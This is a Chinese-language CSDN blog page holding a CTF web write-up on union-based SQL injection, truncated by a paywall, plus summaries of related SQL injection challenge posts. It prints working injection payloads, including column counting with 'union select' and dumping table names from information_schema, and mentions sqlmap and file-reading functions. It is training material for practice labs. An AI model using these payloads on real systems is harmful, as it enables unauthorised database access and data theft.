CTF---Web---SQL注入---11---注入列的选择与id的值

最新推荐文章于 2024-04-14 16:47:44 发布
最新推荐文章于 2024-04-14 16:47:44 发布
阅读量858 收藏
点赞数
分类专栏: 刷题记录 CTF web 文章标签: CTF web SQL注入 刷题记录 hgzzk
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22160557/article/details/119292947
版权
本文介绍了在CTF Web挑战中遇到的一个SQL注入问题,涉及如何确定列数、爆表以及字段信息。通过尝试不同的列数,发现列的选择对结果的影响,并在无法继续注入时调整位置。同时,探讨了id值为1和-1时的不同执行情况。
摘要由CSDN通过智能技术生成

文章目录

前言

题目分类:

CTF—Web—SQL注入—11—注入列的选择与id的值

一、题目描述

题目:SQL注入
在这里插入图片描述

二、解题步骤

1、尝试列数

Step1:尝试列数,1 union select 1,2,3,4#

列数为4列

1 union select 1,2,database(),4#

数据库名为:inject_05

2、爆表的两种方式

Step2:爆表

-1 union select 1,(select group_concat(table_name) from information_schema.tables where 	table_schema=database()),3,4#

在这里插入图片描述

-1 union select 1,2,group_concat(table_name),4 from infor
最低0.47元/天 解锁文章
ygxzq520
关注
专栏目录
CTF---Web---SQL注入---02---sqlmap常规模式
qq_22160557的博客
07-29 473
文章目录前言一、题目描述二、解题步骤1、id查询2、sqlmap跑URL总结 前言 题目分类: CTFWebSQL注入—02—sqlmap常规模式 一、题目描述 题目:sql注入 链接:192.168.87.184 提示:order 二、解题步骤 1、id查询 Step1:根据id查询一下,url变成了 http://192.168.87.184/?order=id&button=submit 由链接可知,此为get传参。 2、sqlmap跑URL Step2:利用kali中的sqlma
CTF---Web---SQL注入---07---注入点+level
qq_22160557的博客
07-31 525
文章目录前言一、题目描述二、解题步骤1、寻找注入点2、请求包保存3、sqlmap爆破三、总结 前言 题目分类: CTFWebSQL注入—07—注入点+level 一、题目描述 题目:添加备注 二、解题步骤 1、寻找注入点 Step1:本题在常规注入的地方,是无法注入的:但是这是下面有个添加备注的地方 2、请求包保存 Step2:添加备注后,抓包后,保存为txt文件 3、sqlmap爆破 Step3:丢到sqlmap中跑就行了。 注入点为id注入类型为以时间为基础的时间盲注。 Step4:爆
CTFWeb——SQL注入
洛柒尘的博客
06-09 9158
前言 在刚学习sql注入的过程中非常艰难,查资料的时间有一周这么长,点开的网页也不下一千,认真读的也最少有两百,可是能引导入门的真的没几篇,都是复制来复制去的,没意思,感觉就是在浪费时间。有很多知识点都很散,很少能考到一片吧所有知识点总结在一块,最少也要三四个知识点也好呀,可惜太少了,大部分大佬写的都是基于他们现有的技术写的,写的很笼统,不适合新手看。可以发现很多大佬的文章看不懂就是这个原因,没有基础看的很懵的。所以我就想着写两三篇来总结我学习过的sql注入知识点。 学习web推荐先学习Mysql、H
BUUCTF 第一章 web入门]SQL注入-11
最新发布
m0_74167420的博客
04-14 363
根据sqlmap数据库查询flag.
N1Book [第一章 web入门]-sql注入
m0_61368098的博客
08-20 826
重要的数据库:   information_schema   包含MySQL中所有的数据库信息 重要的表:   schemata   mysql中所有数据库的信息   schema_name  所有数据库名   tables   数据库表中的信息   table_schema 记录数据库名    table_name  记录数据表名 columns   信息 column_name  字段名
[第一章 web入门]SQL注入
chbeloved的博客
07-20 464
[第一章 web入门]SQL注入-1 打开界面是这样,sql注入嘛那就hackbar里面动手,先查有几,用order by 1一直到order by 4 不存在回显。 说明就三。现在查询库,提一下前面的id=1需要改成=0或者负数让前面id那块报错才能继续查下去(个人理解)。 这里找到库的名字是note 下一步查表名,下面俩种写法都ok 表找到了 下一步找 得到fllllag这个,就要开始爆。得到flag。 总结就是一步一步,爆库,表,。 ...
[理论-学习]Web安全-SQL注入-基础11
3hex的博客
08-21 182
声明: 由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。 笔记内容来源于各类网课。 环境: 以Sqli-labs中的less1为实验环境。 一、SQL读写文件函数 1. load_file(file_name) 读取文件,将文件内容作为字符串返回。文件使用'/'作为间隔符。 需要满足一下条件: 对目标文件有可读权限; 文件在服务器上,不能是网络上的文件; 必须使用绝对路径; 文件大小必须小于max_allowed_packet大小。 同时还要保证secur.
CTF-Web-SQL注入
beihai2013
01-26 3340
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入,sql的show语句,sql的预编译,sql修改表 参考:https:/
ctf-web-sql注入
热门推荐
god_001的博客
05-03 1万+
题目链接:跳转提示 打开网页,一个登陆页面,根据题是本题题型是基于布尔的SQL盲注 首先在用户名处输入admin 得到结果: 即密码确为admin,而如果不输入用户名直接输入密码,发现报错 可见后台是先判断用户名是否正确存在,当用户名正确后再判断密码是否正确。 经测试发现,当出现'空格符','=','and'等字符时,发现会报错显示:‘illegal character’,即知道这些字符会被过滤,可以用括号来避免空格符的使用,用<>(大于或小于)来避免'='的使用 尝试输入
二、CTF-Web-SQL注入记录CTF学习)
qq_27920699的博客
12-16 473
个人CTF学习之路
CTFweb学习记录 -- SQL注入基础
lifanxin的博客
05-18 803
SQL注入概述基本原理MySql注入基本知识information_schemasql注入常用知识总结 概述   SQL注入就是指web应用程序对用户输入数据的合法性没有判断,没有进行有效的字符过滤,前端传入后端的参数是攻击者可控的,并且参数被带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。 基本原理   所谓sql注入的基本原理,也就是说sql注入是怎么发生的,我们以下面php代码中构造sql查询语句的方式为例。 <?php $id = $_GET['id']; $que
《从0到1》[第一章 web入门]SQL注入
m0_63253040的博客
03-21 206
进入环境 url里有?id=1,存在sql注入,当id=4时有提示 左上角会有查询语句的显示,我们直接开始注入 先看字段数,到4时无回显 看回显位置 爆数据库:note 爆数据表:fl4g,notes 爆字段:fllllag 查数据:n1book{union_select_is_so_cool} ...
判断ID不为空,怎么做?if (Request.Params ["id"] !=null)
buyifly的专栏
08-15 3391
int id;try{id=int.Parse(Request.QueryString["id"];}catch{id=1;}
CTF show 萌新web-1
small_whitehat的博客
02-09 181
ctf show 的萌新web1。
[第一章 web入门]SQL注入 三种解法
u011250160的博客
12-15 1288
解法一:联合查询 看到这个id=1莫名的就想试试id=2,3,4 index.php?id=1 index.php?id=2 index.php?id=3 id=4的时候就没了 index.php?id=4 查看下tips 如果有能力的话还是自己猜后台的语句 index.php?id=1&tips=1 判断字段个数 当order by 1,2,3没错 当order by 1,2,3,4没显示了 说明这里就是三个字段 然后寻找回显的位置 之前的文章里我也提到过,联合查询会先显示前面
CTFweb篇-SQL注入(一)
weixin_44597701的博客
08-12 1520
基本函数和知识 基本数据库information_schema information_schema是一个数据库,放的是一些视图,在SQL文件中找不到。 其中具有表schemata(数据库名)、tables(表名)、columns(名获字段名) schemata表中有schema_name来存储数据库名 在tables表中,table_schema和table_name来存储数据库名和表名 在columns表中,有table_schema、table_name、column_name 基本函数 user(
CTF---Web---SQL注入---10---get传参的删减
qq_22160557的博客
08-01 573
文章目录前言一、题目描述二、解题步骤1、注入点的确定2、爆字段三、总结 前言 题目分类: CTFWebSQL注入—10—get传参的删减 一、题目描述 题目:小试牛刀 二、解题步骤 1、注入点的确定 Step1:利用http://172.16.15.193/stage/9/get_info.php?title=xiaoshiniudao&order=id 这个网址跑sqlmap,提示title不是注入点。 Step2:此题为get传参,参数可以删减。猜测注入点为order。 sqlm
CTF-Web17(涉及手工,脚本,工具注入
→_→
09-17 399
17.简单的sql注入之3 分析: 手工注入: 首先先作判断: 正常情况下输入?id=1,页面正常输出hello,?id=0页面不输出 输入?id=’页面直接报SQL语法错误 输入?id=1 and 1=2页面正常 ?id=1' and '1'='2 页面无输出可以看出,这个是字符型SQL注入,未过滤引号和and,条件正确的情况下输出hello,错误无输出,比起SQL盲注,好 像又多了语法报错 猜解表 ?id=1' and (select count(*) from 表名)>0 .
CTF 简单sql
明月于心的博客
07-25 1283
针对网络安全实验室 注入关该题,写一下自己的思路 打开页面 发现就一句话,那就查看下网页源代码,不查不知道,一查吓一跳,他直接告诉我们做题的思路,就是最古老的手工注入 因为他这里告诉我们 id=1,我觉得他给我们的提示,id不重要,而是后边的话重要,直接告诉我们,类似于这种题,应该怎么做。 好了 ,进入正题 那我们就开始: 那我们就在url 网址中去试,看看他有几个字段,当我们让id=4时,发...
墨者学院 - SQL手工注入漏洞测试(Sql Server数据库)
多崎巡礼的博客
07-27 6923
手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,应用程序获取id,然后把拼接到查询语句中,在到数据库中查询,通过程序解析后,把结果返回在页面上,(使用时请将mozhe.cn替换成对应的靶场地址)。 开启靶场环境: 第1步: 页面提交:http://mozhe.cn/new_list.php?id=2 数据库执行语句:select * from manage w...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值